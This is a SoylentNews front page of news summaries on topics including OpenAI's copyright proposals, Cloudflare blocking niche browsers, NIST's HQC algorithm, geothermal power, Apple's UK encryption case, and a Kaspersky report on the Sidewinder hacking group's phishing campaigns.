Stories
Slash Boxes
Comments

SoylentNews is people

SoylentNews is powered by your submissions, so send in your scoop. Only 16 submissions in the queue.

Log In

Log In

Create Account  |  Retrieve Password


Site News

Join our Folding@Home team:
Main F@H site
Our team page


Funding Goal
For 6-month period:
2022-07-01 to 2022-12-31
(All amounts are estimated)
Base Goal:
$3500.00

Currently:
$438.92

12.5%

Covers transactions:
2022-07-02 10:17:28 ..
2022-10-05 12:33:58 UTC
(SPIDs: [1838..1866])
Last Update:
2022-10-05 14:04:11 UTC --fnord666

Support us: Subscribe Here
and buy SoylentNews Swag


We always have a place for talented people, visit the Get Involved section on the wiki to see how you can make SoylentNews better.

What technological advancement do you look forward to the most?

  • Supercapacity batteries
  • Holographic displays
  • Routine space travel
  • Quantum computers
  • Curing/Preventing disease
  • Time travel
  • Flying cars
  • Other (please specify in the comments)

[ Results | Polls ]
Comments:95 | Votes:147

posted by janrinok on Monday March 17, @10:53PM   Printer-friendly
from the one-law-for-thee... dept.

Arthur T Knackerbracket has processed the following story:

The ChatGPT developer submitted an open letter full of proposals to the White House Office of Science and Technology (OSTP) regarding the Trump administration's AI Action Plan, currently under development.

It outlines the super-lab's views on how the White House can support the American AI industry. This includes putting in place a regulatory regime – but one that "ensures the freedom to innovate," of course; an export strategy to let America exert control over its allies while locking out enemies like China; and adopting measures to drive growth, including for federal agencies to "set an example" on adoption.

The suggestions regarding copyright display a certain amount of hubris. It talks up the "longstanding fair use doctrine" of American copyright law, and claims this is "even more critical to continued American leadership on AI in the wake of recent events in the PRC," presumably referring to the interest generated by China's DeepSeek earlier this year.

America has so many AI startups because the fair use doctrine promotes AI development, OpenAI says, while "rigid copyright rules are repressing innovation and investment," in other markets, singling out the European Union for allowing "opt-outs" for rights holders.

The biz previously claimed it would be "impossible" to build top-tier AI models that meet today's needs without using people's copyrighted work.

It proposes that the US government "take steps to ensure that our copyright system continues to support American AI leadership," and that it shapes international policy discussions around copyright and AI, "to prevent less innovative countries from imposing their legal regimes on American AI firms and slowing our rate of progress."

Not content with that, OpenAI wants the US government to actively assess the level of data available to American AI firms and "determine whether other countries are restricting American companies' access to data and other critical inputs."

Dr Ilia Kolochenko, CEO at ImmuniWeb and an Adjunct Professor of Cybersecurity at Capitol Technology University in Maryland, expressed concern over OpenAI's proposals.

"Arguably, the most problematic issue with the proposal – legally, practically, and socially speaking – is copyright," Kolochenko told The Register.

"Paying a truly fair fee to all authors – whose copyrighted content has already been or will be used to train powerful LLM models that are eventually aimed at competing with those authors – will probably be economically unviable," he claimed, as AI vendors "will never make profits."

Advocating for a special regime or copyright exception for AI technologies is a slippery slope, he argues, adding that US lawmakers should regard OpenAI's proposals with a high degree of caution, mindful of the long-lasting consequences it may have on the American economy and legal system.

OpenAI also proposes maintaining the three-tiered AI diffusion rule framework, but with some alterations to encourage other nations to commit "to deploy AI in line with democratic principles set out by the US government."

The stated aim of this strategy is "to encourage global adoption of democratic AI principles, promoting the use of democratic AI systems while protecting US advantage."

OpenAI talks of expanding market share in Tier I countries (US allies) through the use of "American commercial diplomacy policy," banning the use of China-made equipment (think Huawei) and so on.

The ChatGPT lab also proposes "AI Economic Zones" to be created in America by local, state, and the federal government together with industry, which sounds similar to the UK government's "AI Growth Zones."

These will be intended to "speed up the permitting for building AI infrastructure like new solar arrays, wind farms, and nuclear reactors," and would allow exclusions from the National Environmental Policy Act, which requires federal agencies to evaluate the environmental impacts of their actions.

Finally, OpenAI proposes that federal agencies should "lead by example" on AI adoption. Uptake in federal departments and agencies remains "unacceptably low," the Microsoft-championed lab says, and wants to see the "removal of known blockers to the adoption of AI tools, including outdated and lengthy accreditation processes, restrictive testing authorities, and inflexible procurement pathways."

Google has also put out its response [PDF] to the White House's action plan call, arguing also for fair use defenses and data-mining exceptions for AI training.


Original Submission

posted by janrinok on Monday March 17, @06:11PM   Printer-friendly
from the WWW-or-not dept.

For the third time in recent memory, CloudFlare has blocked large swaths of niche browsers and their users from accessing web sites that CloudFlare gate-keeps. In the past these issues have been resolved quickly (within a week) and apologies issued with promises to do better:
2024-03-11: Cloudflare checks broken again?
2024-07-08: Cloudflare checks broken yet AGAIN?
2025-01-30: Cloudflare Verification Loop issues

This time around it has been over 6 weeks and CloudFlare has been unable or unwilling to fix the problem on their end, effectively stalling any progress on the matter with various tactics including asking browser developers to sign overarching NDAs:
Re: CloudFlare: summary and status

Some of the affected browsers:
• Pale Moon
• Basilisk
• Waterfox
• Falkon
• SeaMonkey
• Various Firefox ESR flavors
• Thorium (on some systems)
• Ungoogled Chromium

From the main developer of Pale Moon:

Our current situation remains unchanged: CloudFlare is still blocking our access to websites through the challenges, and the captcha/turnstile continues to hang the browser until our watchdog terminates the hung script after which it reloads and hangs again after a short pause (but allowing users to close the tab in that pause, at least). To say that this upsets me is an understatement. Other than deliberate intent or absolute incompetence, I see no reason for this to endure. Neither of those options are very flattering for CloudFlare.

I wish I had better news.


Original Submission

posted by janrinok on Monday March 17, @01:23PM   Printer-friendly
from the Cryptology-and-Glowies dept.

From https://www.nist.gov/news-events/news/2025/03/nist-selects-hqc-fifth-algorithm-post-quantum-encryption

NIST has chosen a new algorithm for post-quantum encryption called HQC, which will serve as a backup for ML-KEM, the main algorithm for general encryption.
HQC is based on different math than ML-KEM, which could be important if a weakness were discovered in ML-KEM.
NIST plans to issue a draft standard incorporating the HQC algorithm in about a year, with a finalized standard expected in 2027.

The overall process at NIST is https://en.wikipedia.org/wiki/NIST_Post-Quantum_Cryptography_Standardization

The algo's "homepage" seems to be https://pqc-hqc.org/

Currently there only seems to be a C++ implementation; has anyone else found other implementations? Have you upgraded your software, including SN, to PQC?


Original Submission

posted by janrinok on Monday March 17, @08:36AM   Printer-friendly
from the It's-Gnat-Large dept.

Here's the Story

If you thought the Raspberry Pi's chip was dinky, well, get a load of the nattily named Texas Instruments MSPM0C1104, said to the world's smallest microcontroller or MCU and measuring a mere 1.38 mm².

If you look carefully at the image [...] , you can just make out the eight ball-grid connectors on the tiny 1.38 mm² chip package. In other words, that almost-invisible thing isn't just the silicon chip, but the entire chip package equivalent to a fully packaged CPU from Intel or AMD, not just the silicon inside. Yup, mind veritably blown. For reference, the package for the Broadcom BCM2712 chip that powers the Raspberry Pi 5 is about 20 mm². So you could fit about 200 of these things in the space the Broadcom BCM2712 takes up.

[...]

Despite the diminutive proportions, which Texas Instruments claims to be 38% smaller than any other MCU, this teensy spec of a chip packs a fully functional Arm 32-bit Cortex-M0+ CPU core running at a towering 24 MHz. It also has 16 KB of flash memory and 1 KB of SRAM.


Original Submission

posted by hubie on Monday March 17, @03:50AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

The European Space Agency this week inaugurated its new supercomputing facility built with HPE.

The aptly named "SpaceHPC" facility is billed as being "demonstrator infrastructure" designed to help Europe's space industry "mitigate risks associated with data processing, modelling, and simulations."

Located in the Italian town of Frascati, 20km outside Rome, Space HPC houses a machine packing 34,000 cores' worth of the "latest generation of AMD & Intel processors." 108 Nvidia H100 GPUs are also present, giving the machine 5 petaflops of raw performance potential.

That power would see Space HPC ranked in around 210th place on the current Top 500 List of Earth's mightiest supercomputers.

The machine uses InfiniBand networking, packs 156 TB of RAM, and includes 3.6 PB of solid state disk storage.

Direct liquid cooling allowed it to bag a power usage effectiveness score of "below 1.09." The machine is also plumbed into the heating system of the campus where it resides.

As is usually the case with supercomputers, Space HPC can be configured to run different workloads. The machine therefore offers partitions dedicated to general compute tasks, and two other partitions that take advantage of the H100s to run AI/ML workloads or other software that needs accelerators.

ESA's Space Safety Programme has already tested Space HPC to improve its ability to – you guessed it – model space weather. Among other things, it can improve warnings of future solar activity that could pose a danger to infrastructure in orbit or on the ground.

[...] The org is, however, already considering expressions of interest for time on the machine at a form you can find here.


Original Submission

posted by hubie on Sunday March 16, @11:07PM   Printer-friendly

Quaise Energy reaches back to push geothermal power forward

https://newatlas.com/energy/quaise-energy-reaches-back-push-geothermal-power-forward/

Quaise Energy has been dazzling us lately with its bleeding-edge plans to tap super-deep, superheated steam as a global power source. Now, the company's reaching back over a century to adapt yesterday's technology for tomorrow's energy.

Quaise Energy can't be accused of being unambitious. Geothermal power has a tremendous potential for providing humanity with unlimited energy for the foreseeable future, but it suffers from the fact that it's only really practical in a few places where the sources of subterranean heat are close enough to the surface to be easily tapped.

What Quaise Energy wants to do is get around this by going straight to the source. In other words, instead of waiting for the heat to come to us, we go to the heat. Using a traditional rotary drill bit and a gyrotron-powered energy beam to burrow up to an incredible 12.4 miles (20 km) to a region in the Earth's crust that is heated to 500 °C (932 °F).

Not only would this make geothermal power accessible in almost any place that isn't a high mountain chain, it also brings a bonus. At this depth and that heat, water is heated and squashed to the point where it is supercritical. That is, when the temperature is above 373.9 °C (705.2 °F) and the pressure is over 218 atmospheres, the water enters a state where it is neither a liquid nor a gas. Instead, it behaves as a single homogeneous fluid and shifts from being an almost-liquid to an almost-gas depending on the current conditions.

When in a supercritical state, water has lower viscosity than liquid water, yet higher than steam, allowing for improved flow dynamics in turbines and heat exchangers. It also has lower thermal conductivity than liquid water but higher than that of dry steam, aiding heat transfer. It expands very rapidly when depressurized, and its specific heat capacity changes dramatically near the critical point, allowing for efficient energy absorption. This gives it higher thermal efficiency and the ability to hold 10 times more energy than regular water or steam.

If that isn't enough, it can even clean the pipes it's flowing through thanks to its ability to dissolve salts and other impurities.

[...] The question is, how to make it work? For the answer, Quaise went back to the first geothermal plant, Larderello 1, that opened in Italy in 1914. Instead of having one loop with water going into the Earth and then returning steam to the surface, this used two loops of water with one collecting the heat deep underground and the second swapping the heat from the first to bring it to the turbines on the surface.

[...] "The applications are diverse, from power plants to regional heating to domestic ground-source heat pumps, and there are a lot of fresh new eyes on the field," said Daniel W. Dichter of Quaise Energy. "There's a renaissance happening in geothermal right now."

Geothermal Could Power Nearly All New Data Centers Through 2030

Geothermal could power nearly all new data centers through 2030:

There's a power crunch looming as AI and cloud providers ramp up data center construction. But a new report suggests that a solution lies beneath their foundations.

Advanced geothermal power could supply nearly two-thirds of new data center demand by 2030, according to an analysis by the Rhodium Group. The additions would quadruple the amount of geothermal power capacity in the U.S. — from 4 gigawatts to about 16 gigawatts — while costing the same or less than what data center operators pay today.

In the western U.S., where geothermal resources are more plentiful, the technology could provide 100% of new data center demand. Phoenix, for example, could add 3.8 gigawatts of data center capacity without building a single new conventional power plant.

Geothermal resources have enormous potential to provide consistent power. Historically, geothermal power plants have been limited to places where Earth's heat seeps close to the surface. But advanced geothermal techniques could unlock 90 gigawatts of clean power in the U.S. alone, according to the U.S. Department of Energy.

Advanced or enhanced geothermal encompasses a wide range of approaches, but generally they drill deeper and wider than before. That allows them to access hotter rocks — which translates into more power — and pack more geothermal wells onto a single property. The sector has seen a surge of startups in recent years, driven in part by knowledge and technology borrowed from oil and gas companies.

Fervo Energy, for example, was founded by former oil and gas engineers to expand geothermal's potential using horizontal drilling techniques perfected over the last few decades. The company raised over $200 million in 2024 on the heels of significant cost reductions in well drilling.

Another startup, Bedrock Energy, is drilling deep to minimize geothermal's footprint, allowing space-constrained office buildings and data centers to extract more power from their limited footprints. The company's specialized drilling rigs bore down more than 1,200 feet to tap consistent heat year-round.

Quaise Energy's technology sounds like something out of science fiction. The startup vaporizes rock using microwaves generated by gyrotrons. By skipping traditional drill bits, Quaise hopes to drill as deep as 12.4 miles (20 kilometers). At that depth, the rocks are nearly 1,000°F year-round, offering nearly limitless amounts of heat to drive generators or warm buildings.

While most companies are using Earth's ability to provide and store heat, another startup is using it to store energy another way. Sage Geosystems has been injecting water into wells under pressure. When power is needed, it can open the taps and run the water through a turbine, sort of like an upside-down hydroelectric dam.

Because geothermal power has very low running costs, its price is competitive with data centers' energy costs today, the Rhodium report said. When data centers are sited similarly to how they are today, a process that typically takes into account proximity to fiber optics and major metro areas, geothermal power costs just over $75 per megawatt hour.

But when developers account for geothermal potential in their siting, the costs drop significantly, down to around $50 per megawatt hour.

The report assumes that new generating capacity would be "behind the meter," which is what experts call power plants that are hooked up directly to a customer, bypassing the grid. Wait times for new power plants to connect to the grid can stretch on for years. As a result, behind the meter arrangements have become more appealing for data center operators who are scrambling to build new capacity.


Original Submission #1Original Submission #2

posted by hubie on Sunday March 16, @06:20PM   Printer-friendly
from the old-child-abuse-and-terrorism-excuse dept.

Apple's encrypted data case against the UK government has begun in secret at the Royal Courts of Justice:

The Home Office has demanded the right to access data from Apple users that have turned on Advanced Data Protection (ADP), a tool that prevents anyone other than the user - including the tech giant - from reading their files.

Apple says it is important for privacy - but the UK government says it needs to be able access data if there is a national security risk.

The BBC - along with civil liberties groups and some US politicians - argue the case should be heard in public.

But Friday's session of the Investigatory Powers Tribunal - which is hearing the matter - was held behind closed doors.

[...] The case is about balancing national security against privacy rights.

ADP is end to end encrypted, meaning no-one can access files that have been secured with it apart from their owner.

Other end to end encrypted services in the UK include Signal, Meta's WhatsApp, and Apple's iMessage.

In February, it emerged the UK government was seeking the right to be able to access data protected in this way using powers granted to it under the Investigatory Powers Act.

The Act allows it to compel firms to provide information to law enforcement agencies.

Apple responded by pulling ADP in the UK and then launching legal action to challenge the government's demand.

Apple says agreeing to what the UK is asking for it would require the creation of a so-called backdoor, a capability critics say would eventually be exploited by hackers.

"As we have said many times before, we have never built a backdoor or master key to any of our products or services and we never will," Apple says on its website.

The Home Office has previously told the BBC: "The UK has a longstanding position of protecting our citizens from the very worst crimes, such as child sex abuse and terrorism, at the same time as protecting people's privacy.

"The UK has robust safeguards and independent oversight to protect privacy and privacy is only impacted on an exceptional basis, in relation to the most serious crimes and only when it is necessary and proportionate to do so."


Original Submission

posted by hubie on Sunday March 16, @01:34PM   Printer-friendly

Five years ago, on March 11, 2020, the World Health Organization declared COVID-19 a pandemic. Whether it still is depends on who you ask. There are no clear criteria to mark the end of a pandemic, and the virus that causes the disease — SARS-CoV-2 — continues evolving and infecting people worldwide.

“Whether the pandemic ended or not is an intellectual debate,” says clinical epidemiologist and long COVID researcher Ziyad Al-Aly of Washington University in St. Louis. “For the family that lost a loved one a week ago in the ICU, that threat is real. That pain is real. That loss is real.”

According to recent WHO data, 521 people in the United States died of COVID-19 in the last week of 2024. That’s drastically lower than at the height of the pandemic in 2020. Nearly 17,000 people died of COVID-19 the last week of that year.

Dropping death and hospitalization rates, largely due to vaccinations and high levels of immunity, led to WHO and the United States ending their COVID-19 public health emergencies in 2023. The U.S. government has since reduced reporting of infections and access to free vaccines, tests and treatments. In the last two years, health professionals, scientists and policymakers have shifted to managing COVID-19 as an endemic disease, one that’s always present and may surge at certain times of the year.

Over the last five years, researchers have learned heaps about the virus and how to thwart it. But the pandemic also provided insights into health inequities, flaws in health care systems and the power of collaboration. But it’s hard to predict how the United States and other countries will manage COVID-19 going forward, let alone future pandemics.

[...] Long COVID can affect nearly every organ system. People think about it [as causing] brain frog and fatigue. Those can be symptoms of long COVID, but it’s much more than that. We have people with heart problems, kidney problems and metabolic problems. In some individuals, long COVID can be mild and not disabling. But in others, it can be severely disabling, to the point of people being in bed and losing their jobs.

Unfortunately, we haven’t really cracked the code for treating long COVID. There are still no established treatments approved by the FDA.

[...] Some of the biggest threats are people being fatigued with COVID [news] and the amount of misinformation and disinformation.

If a pandemic breaks out in March 2025, I predict that vaccine uptake would be way less than it was for COVID-19, and there would be less enthusiasm for masking and a lot of the public health measures that protected millions of people in the U.S.

Scientists across the globe dropped everything they were doing and said, “Okay, we’re going to focus on long COVID.” There’s no other condition that, within the span of five years, we have this many academic publications — about 40,000 and counting.

Then, really the patient community that led the way. Patients with long COVID helped us understand that long COVID is happening, alerted the medical community and guided us in every step of the way in understanding long COVID.

Z. Al-Aly et al. Long COVID science, research and policy. Nature Medicine. Vol. 30, August 2024, p. 2148. doi: 10.1038/s41591-024-03173-6.


Original Submission

posted by hubie on Sunday March 16, @08:46AM   Printer-friendly
from the old-reliable-DOCX dept.

Arthur T Knackerbracket has processed the following story:

Kaspersky described Sidewinder as a "highly prolific" advanced persistent threat (APT) group whose previous prey were mostly government and military instituions in China, Pakistan, Sri Lanka, and parts of Africa.

Its recent wider expansion into Africa has caught researchers' attention. Sidewinder ramped up attacks in Djibouti in 2024 and has since focused its attention on Egypt, representing a shift in tactics.

Part of that shift is the increase in attacks against nuclear power plants and other nuclear energy organizations, particularly in South Asia.

Sidewinder, which launched in 2012 and has suspected but not formally confirmed roots in India, hasn't changed its attack methodology much, still relying on old remote code execution (RCE) bugs that are exploited by malicious documents delivered in spear-phishing campaigns.

"The attacker sends spear-phishing emails with a DOCX file attached," said Kaspersky researchers Giampolo Dedola and Vasily Berdinkov. "The document uses the remote template injection technique to download an RTF file stored on a remote server controlled by the attacker.

"The file exploits a known vulnerability (CVE-2017-11882) to run a malicious shellcode and initiate a multi-level infection process that leads to the installation of malware we have named Backdoor Loader. This acts as a loader for StealerBot, a private post-exploitation toolkit used exclusively by Sidewinder."

The StealerBot implant was first identified in 2024, but SideWinder has continued to use and refine it in ongoing campaigns. Kaspersky noted that the implant has remained unchanged since its discovery, but the group appears to be developing new iterations of its loader regularly.

The fake documents attached to spear-phishing emails are carefully crafted and appear legitimate upon a cursory inspection. They are also tailored for each target.

[...] The group's main tactics – phishing and an eight-year-old vulnerability – don't immediately bear the hallmarks of a sophisticated bunch of attackers. Kaspersky made the same observation in its previous report on the group but suspects those behind the attacks are highly skilled.

"Sidewinder has already demonstrated its ability to compromise critical assets and high-profile entities, including those in the military and government. We know [of] the group's software development capabilities, which became evident when we observed how quickly they could deliver updated versions of their tools to evade detection, often within hours."

The fact that it uses well-maintained and effective in-memory malware such as StealerBot also suggests that Sidewinder's various capabilities make it "a highly advanced and dangerous adversary," as Kaspersky puts it.


Original Submission

posted by janrinok on Sunday March 16, @04:01AM   Printer-friendly

SpaceX launches astronauts for long-awaited International Space Station crew swap:

SpaceX successfully launched four people into space on Friday, beginning a mission that will give the International Space Station enough crew members to allow astronauts Suni Williams and Butch Wilmore to return to Earth after their nine-month stay.

The mission, known as Crew-10, will see SpaceX's Dragon spacecraft dock with the International Space Station (ISS) late Saturday. The new astronauts will overlap with the existing crew for a few days before Williams and Wilmore (along with two others) return to our planet. That could happen as soon as March 19, weather permitting.

SpaceX crew launches to the ISS have become routine, but this mission has been hotly anticipated because of how Williams and Wilmore got to the station in the first place — and because SpaceX CEO Elon Musk has blamed their prolonged stay on former President Joe Biden.

The duo was part of the first crewed launch of Boeing's Starliner spacecraft last June. The test mission was supposed to be a crucial milestone in Boeing's quest to compete with SpaceX for these types of crewed launches to the ISS.

Starliner was supposed to dock with the ISS for 10 days before returning Williams and Wilmore to Earth. But the spacecraft experienced leaks and thruster problems, which delayed Starliner from docking with the ISS.

Starliner eventually coupled with the station and the astronauts were able to board. But Boeing and NASA spent weeks performing testing and analysis before they decided in August to bring Starliner back to Earth empty.

NASA and SpaceX agreed to bring the astronauts home on the next crewed mission to the ISS, Crew-9. They bumped two astronauts off that flight to accommodate the return of Williams and Wilmore. A return flight was slated for February 2025; an earlier flight would have left the ISS understaffed, according to NASA.

While Williams and Wilmore have been aboard the ISS, though, Musk finished helping Donald Trump get elected for a second time, and began his rampage through the federal government with his Department of Government Efficiency. Musk started saying — both on X and in interviews — that he offered to bring the astronauts back earlier but that Biden refused because of political reasons.

Musk has not provided any evidence to support this claim. NASA's former administrator and deputy administrator under Biden have both said that no offer from Musk made it to the space agency's headquarters.


Original Submission

posted by janrinok on Saturday March 15, @11:17PM   Printer-friendly
from the but-some-may-be-rather-like-peninsulas dept.

Author, sysadmin, and Grumpy BSD Guy, Peter N M Hansteen, has written a post about Software Bill of Materials (SBOM) and how they relate to all software, both proprietary and Free and Open Source Software (FOSS). Increasingly maintaining a machine-readable inventory of runtime and build dependencies in the form of an SBOM is becoming the cost of doing business, even for FOSS projects.

Whether you let others see the code you wrote nor not, the software does not exist in isolation.

All software has dependencies, and in the open source world this fact has been treated as a truth out in the open. Every free operating system, and in fact most modern-ish programming languages come with a package system to install software and to track and handle the web of depenencies, and you are supposed to use the corresponding package manager for the bulk of maintenance tasks.

So when the security relevant incidents hit, the open source world was fairly well stocked with code that did almost all the things that were needed for producing what became known as Software Bill of Materials, or SBOM for short.

So what would a Software Bill of Materials even look like?

Obviously nuts and bots would not be involved, but items such as the source code files in your project, any libraries or tools needed to build the thing would be nice-to-knows, and once you have the thing built, what other things -- libraries, suites of utilities, services that are required to be running or other software frameworks of any kind -- that are required in order to have the thing run are bivious items of interest.

So basically, any item your code would need comes out as a dependency, and you will find that your code has both build time and run time dependencies.

There is increasing agreement that SBOMs are now necessary. The question is now becoming how to implement them without adding undue burdens onto developers or even onto whole development teams. Perhaps the way would be to separate out the making of these machine-readable inventories similarly to how packaging is generally separate from the main development activities.

Previously:
(2023) Managing Open Source Software and Software Bill of Materials
(2022) Open Source Community Sets Out Path to Secure Software


Original Submission

posted by janrinok on Saturday March 15, @06:33PM   Printer-friendly

https://phys.org/news/2025-03-rapidly-population-crocs-impacting-australia.html

A team of marine biologists, environmental researchers and land management specialists affiliated with several institutions in Australia, working with a colleague from Canada, has conducted a study of the ecological impact of a huge rise in the population of saltwater crocodiles in Australia's Northern Territories.

In their paper published in the journal Proceedings of the Royal Society B: Biological Sciences, the group describes what they learned about changes in croc size, diet, and the sharp rise in nutrients they excrete into the water system.

Fifty-four years ago, the Australian government banned the hunting of saltwater crocodiles in its Northern Territories. Since that time, the population of crocs has grown from approximately 1,000 to approximately 100,000. The research team wondered about the ecological impact of such a rapid change, and more specifically, if it was possible to quantify the changes that had taken place.

The work by the team involved conducting two major studies. One involved analyzing data that has been amassed by various researchers over the past half-century and then using it to conduct bioenergetic modeling of croc size and population. They then used the models to make estimates about consumption rates of various foods the crocs have been consuming and what they were excreting, and how much.

The other study involved analyzing bones that have been recovered in the region over the years 1970 to 2022. From these, the team was able to learn more about what the crocs had been eating and how much by measuring carbon and nitrogen isotopes.

The researchers found that the size of the crocs has been growing slightly and that increases in population have led to a total biomass increase from an average of 10 kg to 400 kg per kilometer of river area. They also found that the amount of food they ate as a group increased approximately nine-fold. Additionally, the amount of phosphorous and nitrogen excreted rose 56 and 186-fold—most of which went into the water.

Journal Reference: Mariana A. Campbell et al, Quantifying the ecological role of crocodiles: a 50-year review of metabolic requirements and nutrient contributions in northern Australia, Proceedings of the Royal Society B: Biological Sciences (2025). DOI: 10.1098/rspb.2024.2260


Original Submission

posted by janrinok on Saturday March 15, @01:48PM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

A federal judge has dealt a blow to Elon Musk’s DOGE agenda. On Thursday, Judge William Alsup of San Francisco said that the firing of tens of thousands of federal probationary workers had been based on a “lie” and that the government had conducted the expulsions illegally—further calling the initiative a “sham.” Alsup ordered that the workers be reinstated immediately.

Probationary workers—that is, workers who are new to the workforce and haven’t received more advanced benefits and protections—have suffered massive cuts across the government, as DOGE and the Trump administration have attempted to greatly reduce the federal workforce. The case before Alsup concerns litigation brought by union groups representing those workers.

Alsup’s reinstatement order applies to thousands of federal workers fired from the Defense Department, the Department of Veterans Affairs, the Department of Agriculture, the Department of Energy, the Treasury Department, and the Department of the Interior. Government Executive reports that some 24,000 employees would regain their jobs as a result of the judge’s decision.

The government’s firing of the employees was illegitimate because the agencies impacted by the cuts were directed by the Office of Personnel Management to do so, Alsup said. The OPM does not have the authority to make such orders, as those orders could only be made by the agencies themselves, the judge concluded.

Many of the cuts in question took place not long after Musk’s DOGE initiative was announced and a team of Musk-linked workers took over the OPM. That team is said to have included numerous current and former employees of Musk, including Amanda Scales, a former Musk employee who was appointed chief of staff at the agency. On January 31, Reuters reported that Musk aides had locked career civil servants out of the computer systems at the agency and were engaged in some sort of undisclosed work involving said systems. Democratic lawmakers subsequently accused Musk of leading a “hostile takover” of the agency.

On February 14, Reuters reported that, as part of the government downsizing initiative being led by Musk, the Trump administration had begun to fire “scores” of government employees, a majority of which were still on probation. A statement from the OPM at the time said that the Trump administration was “encouraging agencies to use the probationary period as it was intended: as a continuation of the job application process, not an entitlement for permanent employment.”

Charles Ezell, the acting director of the OPM, met with the heads of numerous federal agencies on February 13 and ordered them to fire tens of thousands of employees, according to the unions representing the workers. The government has claimed that Ezell was not issuing orders and was merely providing “guidance.” However, Alsup recently determined that the OPM had, indeed, ordered the firings, and done so illegally.

“The court finds that Office of Personnel Management did direct all agencies to terminate probationary employees with the exception of mission critical employees,” Alsup recently said.

The case before Alsup took a turn this week when Ezell abruptly refused a court order to testify about his role in the firings. “The problem here is that Acting Director Ezell submitted a sworn declaration in support of defendants’ position, but now refuses to appear to be cross-examined, or to be deposed,” Alsup said.

Alsup, a Clinton appointee, had harsh words for the Trump administration’s conduct, claiming that attorneys working for the government had attempted to mislead him. “The government, I believe, has tried to frustrate the judge’s ability to get at the truth of what happened here, and then set forth sham declarations,” he said. “That’s not the way it works in the U.S. District Court.”

Outlets report that Alsup became visibly upset with Trump Justice Department lawyers at various points throughout the hearing. “Come on, that’s a sham. Go ahead. It upsets me, I want you to know that. I’ve been practicing or serving in this court for over 50 years, and I know how do we get at the truth,” Alsup said. “And you’re not helping me get at the truth. You’re giving me press releases, sham documents.”

“It is sad, a sad day,” Alsup continued. “Our government would fire some good employee, and say it was based on performance. When they know good and well, that’s a lie.” He continued: “That should not have been done in our country. It was a sham in order to try to avoid statutory requirements.””

Alsup also ordered discovery and deposition in the case to provide greater transparency about the government’s activities. He further dissuaded the government from trying to paint him as some sort of leftist radical. “The words that I give you today should not be taken as some kind of ‘wild and crazy judge in San Francisco has said that the administration cannot engage in a reduction in force.’ I’m not saying that at all,” Alsup said. The judge noted that the government could not break the law or violate the Constitution while working on such an agenda: “Of course, if he does, it has to comply with the statutory requirements: the Reduction In Force act, the Civil Service Act, the Constitution, maybe other statutes,” Alsup said. “But it can be done.”


Original Submission

posted by hubie on Saturday March 15, @09:07AM   Printer-friendly

Arthur T Knackerbracket has processed the following story:

Earth's atmosphere is shrinking due to climate change and one of the possible negative impacts is that space junk will stay in orbit for longer, bonk into other bits of space junk, and make so much mess that low Earth orbits become less useful.

That miserable set of predictions appeared on Monday in a Nature Sustainability paper titled "Greenhouse gases reduce the satellite carrying capacity of low Earth orbit."

Penned by two boffins from MIT, and another from the University of Birmingham, the paper opens with the observation: "Anthropogenic contributions of greenhouse gases in Earth's atmosphere have been observed to cause cooling and contraction in the thermosphere."

The thermosphere extends from about 90 km to 500 km above Earth's surface. While conditions in the thermosphere are hellish, it's not a hard vacuum. NASA describes it as home to "very low density of molecules" compared to the exosphere's "extremely low density."

Among the molecules found in the thermosphere is carbon dioxide (CO2), which conducts heat from lower down in the atmosphere then radiates it outward.

"Thus, increasing concentrations of CO2 inevitably leads to cooling in the upper atmosphere. A consequence of cooling is a contraction of the global thermosphere, leading to reductions in mass density at constant altitude over time."

That's unwelcome because the very low density of matter in the thermosphere is still enough to create drag on craft in low Earth orbit – enough that the International Space Station requires regular boosts to stay in orbit.

It's also enough drag to gradually slow space junk, causing it to descend into denser parts of the atmosphere where it vaporizes. A less dense thermosphere, the authors warn, means more space junk orbiting for longer and the possibility of Kessler syndrome instability – space junk bumping into space junk and breaking it up into smaller pieces until there's so much space junk some orbits become too dangerous to host satellites.

[...] The good news is the paper notes that satellite makers know Kessler syndrome instability is a possibility, so often build collision avoidance capabilities that let them avoid debris.

The authors hope manufacturers and operators work together on many debris-reduction tactics, and that greenhouse gas emissions are reduced to keep the thermosphere in fine trim.


Original Submission

posted by hubie on Saturday March 15, @04:22AM   Printer-friendly
from the mouthful-of-chiplets dept.

Arthur T Knackerbracket has processed the following story:

According to two leakers.

AMD’s upcoming Zen 6 processors will remain compatible with AM5, but they are set to introduce a new chiplet-based CPU design and significantly boost core counts across desktop and laptop products, according to sources of ChipHell, as well as Moore's Law Is Dead. Premium processors for gamers will also feature 3D V-Cache.

AMD's next-generation Ryzen processors based on the Zen 6 microarchitecture will feature 12-core core chiplet dies (CCDs), marking a major shift from eight-core CCDs used in Zen 3/4/5 generation processors, if the linked reports are accurate. As a result, desktop AM5 processors will be able to feature up to 24 cores. Meanwhile, advanced laptop APUs will transition from a four Zen 5 eight Zen 5c (8+4) configuration to a 12-core structure, at least according to MLID. A Zen 6 CCD is 75mm^2 large, MLID claims.

Now, the increased number of cores is a big deal. However, premium versions of AMD's desktop processors will feature up to 96MB of L3 cache, which is 4MB per core. 4MB per core is in line with existing Zen 5 configurations, so AMD does not cut down caches in favor of core count.

AMD is expected to release Zen 6-based products in 2026, so it is reasonable to expect them to use a more advanced node than they use today (TSMC's 4nm-class), so think TSMC's N3P (3nm-class) given that AMD does exactly use leading-edge nodes (possibly due to supply constraints), which will be N2 (2nm-class) next year.

AMD's Zen 6-based Ryzens for gaming PCs will also feature 3D V-Cache. Some laptop processors with built-in graphics will also feature 3D V-Cache, though exact configuration is something that remains to be seen.

Interestingly, and according to MLID, AMD's standard APUs will be chiplet-based, moving away from the monolithic approach. Medusa Point — a laptop APU — is expected to feature a Zen 6 CCD with 12 cores and a 200mm^2 I/O die (IOD), featuring eight RDNA work groups, a 128-bit memory controller, and a large NPU. There is speculation that Infinity Cache may be added to enhance GPU performance.

MLID also claims that the desktop version of Medusa Point — allegedly called Medusa Ridge — will use up to two 12-core Zen 6 CCD in the AM5 form-factor. That product will have a 155mm^2 IOD without an advanced built-in GPU, but possibly with a large NPU.


Original Submission